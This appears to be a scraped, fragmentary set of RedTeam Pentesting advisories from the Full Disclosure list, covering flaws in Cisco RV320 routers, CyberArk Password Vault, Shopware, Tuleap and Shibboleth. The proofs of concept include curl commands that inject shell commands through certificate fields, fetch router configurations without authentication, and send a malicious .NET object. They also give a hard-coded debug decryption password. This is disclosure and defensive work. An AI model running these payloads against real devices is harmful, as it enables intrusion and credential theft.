52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2019-002] Directory Traversal in Cisco Expressway Gateway

2019-05-17 Thread RedTeam Pentesting GmbH
closure for May 1st to RedTeam Pentesting
2019-05-01 Vendor publishes advisory
2019-05-16 Customer approves release of this advisory
2019-05-17 Advisory released

[1] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvo47769
[4] https://tomcat.apache.org

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2019-005] Cisco RV320 Command Injection Retrieval

2019-03-27 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Command Injection

RedTeam Pentesting discovered a command injection vulnerability in the
web-based certificate generator feature of the Cisco RV320 router which
was inadequately patched by the vendor.


Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: through
Fixed Versions: none
Vulnerability Type: Remote Code Execution
Security Risk: medium
Vendor URL: 
Vendor Status: working on patch
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-005
Advisory Status: published
CVE: CVE-2019-1652
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652


"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
choice for any small office or small business looking for performance,
security, and reliability in its network."
(from the Cisco RV320 product page [1])

More Details

The router's web interface enables users to generate new X.509
certificates directly on the device. Previously, RedTeam Pentesting
identified a vulnerability (rt-sa-2018-004) [2] in this component. By
providing a specially crafted common name, it was possible to inject
shell commands which were subsequently executed on the router as the
root user. This vulnerability was adressed in firmware version
published by Cisco [3].

RedTeam Pentesting discovered that the certificate generator in the patched
firmware is still vulnerable. The update adds several filters to handle
single quotes in user input. However, these filters can be evaded by
specially crafted inputs. By providing the following string for the
certificate's common name, a "ping" command can be injected:

'a$(ping -c 4'b

Proof of Concept

The following HTTP POST request invokes the certificate generator
function and triggers the command injection. It requires a valid session
cookie for the device's web interface. The user agent "curl" is
blacklisted by the firmware and must be adjusted in the HTTP client.

$ curl -s -k -A kurl -X POST -b "$COOKIE" \
--data "page=self_generator.htm&totalRules=1&OpenVPNRules=30"\
"SelectSubject_s=1" \
--data-urlencode "common_name='a\$(ping -c 4'b" \

Afterwards, the incoming ICMP echo requests can be observed on the
attacker's system at


Prevent untrusted users from using the router's web interface.



Security Risk

The vulnerability allows attackers with administrative access to the
router's web interface to execute arbitrary operating system commands on
the device. Because attackers require valid credentials to the web
interface, this vulnerability is only rated as a medium risk.


2018-09-19 Original vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-16 List of affected versions provided by vendor
2019-01-22 Firmware released by vendor
2019-01-23 Advisory (rt-sa-2018-004) published

2019-02-07 Incomplete mitigation of vulnerability identified
2019-02-08 Proof of concept sent to vendor
2019-02-08 Receipt of proof of concept acknowledged by vendor
2019-02-15 Full advisory sent to vendor
2019-02-15 Notified vendor of disclosure date: 2019-03-27
2019-03-25 Requested progress update from vendor
2019-03-25 Vendor requests postponed disclosure
2019-03-25 Postponement declined
2019-03-27 Advisory published


[2] https://www.redteam-pentesting.de/advisories/rt-sa-2018-004

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests 

[FD] [RT-SA-2019-004] Cisco RV320 Unauthenticated Diagnostic Data Retrieval

2019-03-27 Thread RedTeam Pentesting GmbH

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2019-003] Cisco RV320 Unauthenticated Configuration Export

2019-03-27 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Unauthenticated Configuration Export

RedTeam Pentesting discovered that the configuration of a Cisco RV320
router can still be exported without authentication via the device's web
interface due to an inadequate fix by the vendor.


Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: through
Fixed Versions: none
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: 
Vendor Status: working on patch
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-003
Advisory Status: published
CVE: CVE-2019-1653
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653


"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
choice for any small office or small business looking for performance,
security, and reliability in its network."
(from the Cisco RV320 product page [1])

More Details

The Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based
configuration interface, which is implemented in various CGI programs in
the device's firmware. Access to this web interface requires prior
authentication using a username and password. Previously, RedTeam
Pentesting identified a vulnerability (rt-sa-2018-002) [2] in the CGI


By issuing an HTTP GET request to this program, it was possible to
export a router's configuration without providing any prior
authentication. This vulnerability was adressed in firmware version published by Cisco [3].

RedTeam Pentesting discovered that the CGI program in the patched
firmware is still vulnerable. By performing a specially crafted HTTP
POST request, attackers are still able to download the router's
configuration. The user agent "curl" is blacklisted by the firmware and
must be adjusted in the HTTP client. Again, exploitation does not
require any authentication.

Proof of Concept

A device's configuration can be retrieved by issuing an HTTP POST request
to the vulnerable CGI program (output shortened):

$ curl -s -k -A kurl -X POST --data 'submitbkconfig=0' \


Prevent untrusted clients from connecting to the device's web server.



Security Risk

This vulnerability is rated as a high risk as it exposes the device's
configuration to untrusted, potentially malicious parties. By
downloading the configuration, attackers can obtain internal network
configuration, VPN or IPsec secrets, as well as password hashes for the
router's user accounts. Knowledge of a user's password hash is
sufficient to log into the router's web interface, cracking of the hash
is not required. Any information obtained through exploitation of this
vulnerability can be used to facilitate further compromise of the device
itself or attached networks.


2018-09-19 Original vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-11-18 List of affected versions provided by vendor
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-22 Firmware released by vendor
2019-01-23 Advisory (rt-sa-2018-002) published

2019-02-07 Incomplete mitigation of vulnerability identified
2019-02-08 Proof of concept sent to vendor
2019-02-08 Receipt of proof of concept acknowledged by vendor
2019-02-15 Full advisory sent to vendor
2019-02-15 Notified vendor of disclosure date: 2019-03-27
2019-03-25 Requested progress update from vendor
2019-03-25 Vendor requests postponed disclosure
2019-03-25 Postponement declined
2019-03-27 Advisory published


[2] https://www.redteam-pentesting.de/advisories/rt-sa-2018-002

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immedi

[FD] [RT-SA-2019-007] Code Execution via Insecure Shell Function getopt_simple

2019-03-26 Thread RedTeam Pentesting GmbH
responded, document is not updated/maintained any more
2019-03-20 CVE ID requested
2019-03-21 CVE ID assigned
2019-03-26 Advisory released 


[1] https://www.tldp.org/LDP/abs/html/
[2] https://www.tldp.org/LDP/abs/html/string-manipulation.html#GETOPTSIMPLE
[3] https://www.tldp.org/LDP/abs/html/internal.html#EX33
[4] https://www.tldp.org/LDP/abs/html/extmisc.html#EX33A

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2018-004] Cisco RV320 Command Injection

2019-01-24 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Command Injection

RedTeam Pentesting discovered a command injection vulnerability in the
web-based certificate generator feature of the Cisco RV320 router.


Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: and later
Fixed Versions: since
Vulnerability Type: Remote Code Execution
Security Risk: medium
Vendor URL: 
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-004
Advisory Status: published
CVE: CVE-2019-1652
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652


"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
choice for any small office or small business looking for performance,
security, and reliability in its network."
(from the Cisco RV320 product page [1])

More Details

The router's web interface enables users to generate new X.509
certificates directly on the device. A user may enter typical
configuration parameters required for the certificate, such as
organisation, the common name and so on. In order to generate the
certificate, the device uses the command-line program openssl [2]. The
device's firmware uses the following format string to assemble the
openssl command:

openssl req -new  -nodes  -subj 
'/C=%s/ST=%s/L=%s/O=%s/OU=%s/CN=%s/emailAddress=%s' -keyout %s%s.key -sha256 
-out %s%s.csr -days %s -newkey rsa:%s  > /dev/null 2>&1

Although the web interface filters certain special characters via
JavaScript, there is actually no input filtering, escaping or encoding
happening on the server. This allows attackers to inject arbitrary

Proof of Concept

Even though all components of the subject seem to be vulnerable to
command injection, the following example uses the common name to trigger
a ping command:

a'$(ping -c 4'b

The following HTTP POST request invokes the certificate generator
function and triggers the command injection. It requires a valid session
cookie for the device's web interface.

curl -s -b "$COOKIE" \
--data "page=self_generator.htm&totalRules=1&OpenVPNRules=30"\
"SelectSubject_s=1" \
--data-urlencode "common_name=a'\$(ping -c 4'b" \

Afterwards, the incoming ICMP echo requests can be observed on the
attacker's system at


Prevent untrusted users from using the router's web interface.


Install firmware version (or later) on the router.

Security Risk

The vulnerability allows attackers with administrative access to the
router's web interface to execute arbitrary operating system commands on
the device. Because attackers require valid credentials to the web
interface, this vulnerability is only rated as a medium risk.


2018-09-19 Vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-16 List of affected versions provided by vendor
2019-01-23 Advisory published


[2] https://wiki.openssl.org/index.php/Command_Line_Utilities

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories

[FD] [RT-SA-2018-003] Cisco RV320 Unauthenticated Diagnostic Data Retrieval

2019-01-24 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Unauthenticated Diagnostic Data Retrieval

RedTeam Pentesting discovered that the Cisco RV320 router exposes
sensitive diagnostic data without authentication through the device's
web interface.


Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions:,
Fixed Versions: since
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: 
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-003
Advisory Status: published
CVE: CVE-2019-1653
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653


"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
choice for any small office or small business looking for performance,
security, and reliability in its network."
(from the Cisco RV320 product page [1])

More Details

The Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based
configuration interface. In the device's firmware, this functionality is
implemented using a variety of CGI programs. Access to this web
interface requires prior authentication using a username and password.
RedTeam Pentesting discovered the CGI program:


This program can be used to retrieve various diagnostic information from
the device, which includes its current configuration. In contrast to
other functions, this CGI program does not require any form of
authentication. It may be accessed through the router's web server,
which is available from the LAN by default. As described in [2],
firmware versions from 1.4.2 to (including) also expose the web
server to the WAN on TCP port 8007.

Proof of Concept

The diagnostic data can be retrieved by issuing an HTTP POST request to
the vulnerable CGI program. OpenSSL is used to decrypt the data with the
hard-coded password "NKDebug12#$%" before unpacking it with tar (output

$ curl --data submitdebugmsg=1 \
  '' > debug

$ openssl aes-128-cbc -salt -md md5 -d \
  -k 'NKDebug12#$%' < debug > debug.tgz

$ mkdir output && tar -xf debug.tgz -C output/

$ ls -1 output/

$ cat output/nk_sysconfig


Prevent untrusted clients from connecting to the device's web server.


Install firmware version (or later) on the router.

Security Risk

This vulnerability is rated as a high risk as it exposes sensitive
diagnostic information, such as the device's configuration, to
untrusted, potentially malicious parties. By retrieving this
information, attackers can obtain internal network configuration, VPN or
IPsec secrets, as well as password hashes for the router's user
accounts. Knowledge of a user's password hash is sufficient to log into
the router's web interface. Any information obtained through
exploitation of this vulnerability can be used to facilitate further
compromise of the device itself or attached networks.


2018-09-19 Vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-11-18 List of affected versions provided by vendor
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-23 Advisory published


[2] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentest

[FD] [RT-SA-2018-002] Cisco RV320 Unauthenticated Configuration Export

2019-01-24 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Unauthenticated Configuration Export

RedTeam Pentesting discovered that the configuration of a Cisco RV320
router may be exported without authentication through the device's web


Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions:,
Fixed Versions: since
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: 
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-002
Advisory Status: published
CVE: CVE-2019-1653
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653


"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
choice for any small office or small business looking for performance,
security, and reliability in its network."
(from the Cisco RV320 product page [1])

More Details

The Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based
configuration interface. In the device's firmware, this functionality is
implemented using a variety of CGI programs. Access to this web
interface requires prior authentication using a username and password.
RedTeam Pentesting discovered the CGI program:


This program can be used to export the router's configuration. In
contrast to other functions, this CGI program does not require any form
of authentication. It may be accessed through the router's web server,
which is available from the LAN by default. As described in [2],
firmware versions from 1.4.2 to (including) also expose the web
server to the WAN on TCP port 8007.

Proof of Concept

A device's configuration can be retrieved by issuing an HTTP GET request
to the vulnerable CGI program (output shortened):

$ curl -s


Prevent untrusted clients from connecting to the device's web server.


Install firmware version (or later) on the router.

Security Risk

This vulnerability is rated as a high risk as it exposes the device's
configuration to untrusted, potentially malicious parties. By
downloading the configuration, attackers can obtain internal network
configuration, VPN or IPsec secrets, as well as password hashes for the
router's user accounts. Knowledge of a user's password hash is
sufficient to log into the router's web interface. Any information
obtained through exploitation of this vulnerability can be used to
facilitate further compromise of the device itself or attached networks.


2018-09-19 Vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-11-18 List of affected versions provided by vendor
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-23 Advisory published


[2] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

[FD] [RT-SA-2017-015] CyberArk Password Vault Memory Disclosure

2018-04-09 Thread RedTeam Pentesting GmbH
35f 7265 636f 7264 7300 2968 b8fb aae9  s_records.)h
0110: 62

Starting at offset 0xe0, the vault discloses a total of 49 bytes of its
memory to the client.




Upgrade CyberArk Password Vault to version 9.7 or 10.

Security Risk

This vulnerability is rated as a high risk. Exploitation only requires
network access to a PrivateArk Password Vault. Although each request
only discloses about 50 bytes of memory, sustained exploitation will
likely reveal sensitive information at some point in time. This
critically undermines the primary purpose of the PrivateArk Password


2017-11-24 Vulnerability identified
2018-01-22 Customer approved disclosure to vendor
2018-02-05 Vendor notified
2018-04-06 CVE number requested
2018-04-07 CVE number assigned
2018-04-09 Advisory released



RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2017-014] CyberArk Password Vault Web Access Remote Code Execution

2018-04-09 Thread RedTeam Pentesting GmbH

Next, an API call is invoked which includes the malicious .NET object in
its authorization header. This is done with cURL [3] as follows:

$ curl -s -X GET -k \
  --url ''\
  'Applications/?Location=\&IncludeSublocations=true' \
  --header "authorization: $(cat execute-ping.txt)" \
  --header 'content-type: application/json'

Simultaneously, tcpdump [4] is invoked on the host to listen
for ICMP packets originating from the web server:

$ sudo tcpdump -i enp0s25 icmp
tcpdump: verbose output suppressed[...]
listening on enp0s25[...]

IP > ICMP echo request, id 1, seq 6, length 40
IP > ICMP echo reply, id 1, seq 6, length 40

The fact that ICMP packets are received from the web server, indicates
that attacker-controlled code was executed.


Disable any access to the API at the route /PasswordVault/WebServices.


Upgrade CyberArk Password Vault Web Access to version 9.9.5, 9.10 or

Security Risk

The risk of this vulnerability is rated as high. Attackers with access
to the PrivateArk Vault Web Access REST API may execute arbitrary code
on the web server. No credentials are required. Attackers gain access to
the system with the privileges of the web application. Consequently,
such access may be used to backdoor the web application and compromise
further accounts and credentials. Additionally, attackers may pivot from
the web server to attack the vault directly.


2017-11-24 Vulnerability identified
2018-01-22 Customer approved disclosure to vendor
2018-02-05 Vendor notified
2018-02-28 Vendor released fixed version
2018-04-06 CVE number requested
2018-04-07 CVE number assigned
2018-04-09 Advisory released


[2] https://github.com/pwntester/ysoserial.net
[3] https://curl.haxx.se/
[4] https://www.tcpdump.org/

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2017-012] Shopware Cart Accessible by Third-Party Websites

2018-03-13 Thread RedTeam Pentesting GmbH
Advisory: Shopware Cart Accessible by Third-Party Websites

RedTeam Pentesting discovered that the shopping cart implemented by Shopware
offers an insecure API. Malicious, third-party websites may abuse this API to
list, add or remove products from a user's cart.


Product: Shopware
Affected Versions: 4.0.1 - 5.3.7
Fixed Versions: > 5.4.0
Vulnerability Type: Cross-Site Request Forgery
Security Risk: low
Vendor URL: https://shopware.com
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-012
Advisory Status: published
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


"Shopware 5 is the next generation of open source e-commerce software made in
Germany. Based on bleeding edge technologies like Symfony 2, Doctrine 2 & Zend
Framework Shopware comes as the perfect platform for your next e-commerce
project. Furthermore Shopware 5 provides an event-driven plugin system and an
advanced hook system, giving you the ability to customize every part of the
(from the Shopware GitHub repository [1])

More Details

The Shopware web application provides users with a virtual shopping cart to
collect products prior to checkout. This cart is displayed to the user as a
modal sidebar appearing at the right edge of the browser window. Consequently,
Shopware implements several API endpoints to allow JavaScript code to perform
shopping cart operations. These endpoints are implemented in the
"Shopware_Controllers_Frontend_Checkout" class and can be reached through the
following paths:

 * /checkout/ajaxCart
 * /checkout/ajaxAddArticleCart
 * /checkout/ajaxDeleteArticleCart

RedTeam Pentesting discovered that API endpoints support JSONP by specifying a
URL parameter named callback. The origin of calls to the cart API is not
validated. Therefore, any third-party website may make use of this API. If a
customer of a Shopware shop visits a malicious, attacker-controlled website,
JavaScript code on this site may access the user's shopping cart.

Proof of Concept

The following JavaScript snippets demonstrate how to access the cart of a
Shopware shop at "https://example.net"; from a third-party website. The
"getJSON" function of jQuery 3 is used to interface with the JSONP API.

By running the following code, the contents of a cart may be retrieved. The
result of the API call is displayed on the browser's developer console.


The following code adds a new product to the cart. In this case, two instances
of product 1234 are added.


To remove a product from a user's shopping cart, attackers may use the
following code. An id for the "sDelete" parameter may be obtained through a
prior call to ajaxCart.



Support for JSONP should be removed from the cart AJAX API. This ensures, that
only JavaScript code from the same origin may access the API and respectively
the cart's contents. Furthermore, operations which change the state of the cart,
i.e. adding and removing products, must be protected with CSRF tokens.


Upgrade to Shopware newer than 5.4.0.

Security Risk

This vulnerability is rated as a low risk. Disclosure of a user's shopping cart
to attackers may negatively impact the user's privacy. Furthermore, competing
eCommerce sites may use this information to improve sales. By adding or
removing products from a user's cart, attackers can negatively impact a user's
shopping experience and create support effort for the shop operator.


2017-08-28 Vulnerability identified
2017-09-13 Customer approved disclosure to vendor
2017-09-14 Vendor notified
2018-02-27 Vendor released fixed version
2018-03-13 Advisory released


[1] https://github.com/shopware/shopware
[2] https://community.shopware.com/Downloads_cat_448.html#5.4.0

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specia

[FD] [RT-SA-2018-001] Arbitrary Redirect in Tuleap

2018-03-08 Thread RedTeam Pentesting GmbH
Advisory: Arbitrary Redirect in Tuleap

RedTeam Pentesting discovered an arbitrary redirect vulnerability in the
redirect mechanism of the application lifecycle management platform


Product: Tuleap
Affected Versions: >
Fixed Versions: >=
Vulnerability Type: Arbitrary Redirect
Security Risk: low
Vendor URL: https://www.tuleap.org/
Vendor Status: fixed version released
Vendor Issue URL: https://tuleap.net/plugins/tracker/?aid=11136
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-001
Advisory Status: published
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


"Tuleap is an open source tool for Scrum, Kanban, waterfall,
requirement management. Plan, track, code and collaborate on software
projects, you get everything at hand."
(from the Tuleap website [1])

More Details

RedTeam Pentesting discovered an arbitrary redirect vulnerability in the
way Tuleap handles redirects. Usually this function is only used in
Tuleap after an successful login to assigned trackers, however the
redirect can be used indepented of whether a user is authenticated to
the application. While the application employs a URL filter to prevent
arbitrary redirects, the URL filter can be bypassed. This allows
attackers to redirect users to a different website, if a user opens an
attacker prepared URL. 

The filter can be bypassed by using protocol relative URLs, which omit
the leading protocol identifier. These arbitrary URLs are prefixed with
two slashes, which instructs the browser to use the same protocol as the
current page. This behaviour is specified in RFC 3986 [2] in section

Proof of Concept

The following URL to an example installation of Tuleap will redirect
users to an attacker controlled website:



Currently no workaround is known.


Upgrade to at least tuleap version 

Security Risk

Attackers may convice users to use a prepared link to access a valid
Tuleap instance, which then redirects users to a fake login page. This
can greatly increase the effectiveness of phishing attacks and may allow
attackers to steal user credentials more effectively.  However, no
credentials or sensitive information can be extracted directly.
Furthermore, the website to which users are going to be redirected will
be displayed in the browser location bar so that users may identify the
attack. Therefore, we rate this vulnerability with a low risk.

Nevertheless, it is very easy for attackers to identify this
vulnerability and create malicious URLs, which makes it very likely that
attackers might abuse this. 


2018-01-02 Vulnerability identified
2018-01-11 Customer approved disclosure to vendor
2018-02-13 Vendor notified
2018-02-14 Vendor released fixed version
2018-03-05 Vendor made issue public 
2018-03-08 Advisory released 


[1] https://www.tuleap.org/what-is-tuleap
[2] https://tools.ietf.org/html/rfc3986

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2017-013] Truncation of SAML Attributes in Shibboleth 2

2018-01-15 Thread RedTeam Pentesting GmbH
aced with "&s;taf&f1;".
After these modifications, the XML document is re-inserted into the HTTP
POST request which is then sent to the service provider.

The SAML response is accepted by the service provider. Due to the
vulnerability, the service provider application reports "taf" as the
value of the "uid" attribute.


The use of XML encryption can serve as a mitigation for this
vulnerability but may still allow attacks in certain scenarios.


Manually update to the latest version [4] as described in the security
advisory published by Shibboleth [5]. Alternatively, use the operating
system's package management to receive the update [6].

Furthermore, a new version of the XMLTooling-C library (1.6.3) has been
released to address this vulnerability. DTD processing is now disabled
in the XML parser. Yet, some platforms ship with old parser versions
that do not allow DTD processing to be disabled, namely Red Hat and
CentOS.  Therefore, the "unmarshallContent" function has also been
hardened to mitigate the vulnerability on these platforms.

Security Risk

The key feature of Shibboleth, secure transfer of assertions, is
compromised. Therefore, the vulnerability is rated as a high risk. In
certain circumstances, this might lead to a complete bypass of
authorisation mechanisms. In practice, the risk for service providers is
highly dependent on the actual deployment of the Shibboleth
infrastructure: Sometimes, SAML responses are encrypted or not
transferred through a browser. In this case, an attacker is not able to
insert XML entities. Whether truncating SAML attribute values is
profitable for attackers also depends on the actual use and structure of
these values. Attackers may use an application's self-service features
to change their account's email to a manipulated but valid address.
Truncation of this email address in a SAML response could lead to access
to further accounts, effectively bypassing authorisation mechanisms.


